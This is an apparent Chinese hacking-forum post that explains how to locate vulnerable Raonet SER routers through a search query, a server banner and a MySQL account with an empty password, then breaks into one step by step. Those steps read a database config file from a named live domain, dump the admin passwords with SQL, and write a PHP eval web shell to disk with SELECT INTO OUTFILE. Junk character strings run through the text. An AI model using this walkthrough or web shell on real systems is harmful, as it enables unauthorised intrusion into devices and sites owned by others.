寻找存在漏洞的路由器方法:5 v$ L" P" \& y* q+ c& d
. M% T/ F* W5 @1:google搜索'Raonet Subscriber Ethernet Router'5 {8 T0 i. Q+ J& X. X
$ M4 F/ M8 x7 z/ Y( h! Q4 F* H
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 W3 u% u- ~3 s0 V, d
0 g; r/ _/ U2 G1 V4 r) F3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。" ?( m1 J* I* Z, i9 A
+ {* I. Y6 ~- X4 b7 `//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
6 s1 O' W( r9 r6 Z }( ]4 ~& o8 l0 ~. r5 `1 ~4 M. {7 j, X
$ s) d8 I0 h7 [* o: r S, b3 Q% e% O+ x3 q7 B
入侵步骤:8 Y% T0 t: F( J1 @4 I- J, Q
( ^) G9 S- w$ [. D; m( ` S
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; M- x5 |: x$ d8 _- b2 i4 ]
4 y# H) U' G0 E- q! _; J3 f
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
- h' P# a! c9 E* \0 Y1 _8 X5 { R3:得到密码后连接,查看GUI管理密码:& N8 E" [- i: w" o
use ser_500/ S! I8 C: O8 U- f
select id,passwd from user;
4 g$ r+ R" o6 e, V9 B5 z: C4:通过数据库写入webshell,执行命令:' G1 t* ]+ N- {6 N
use mysql;
' x, N- \6 m$ B) g9 Kcreate table ok(cmd TEXT);" N% x+ D* y" F1 F) x: J/ ?
insert into ok values("<?php @eval($_POST[cmd])?>");
1 K+ e% [9 G5 H) ^5 I, i4 Fselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
1 f( r# t, B& F" y+ b0 Kdrop table ok;
f; V9 G+ K" y9 V2 p1 T% b* H, V2 p3 c# y% [8 `
5:连接后门shell.php
+ e% L% T N4 F$ }, A' y1 }3 L. h" [
6. 搞定!
; R9 @ j+ n3 X" }2 p3 ^! l+ G. [+ l9 o: t9 P9 X
|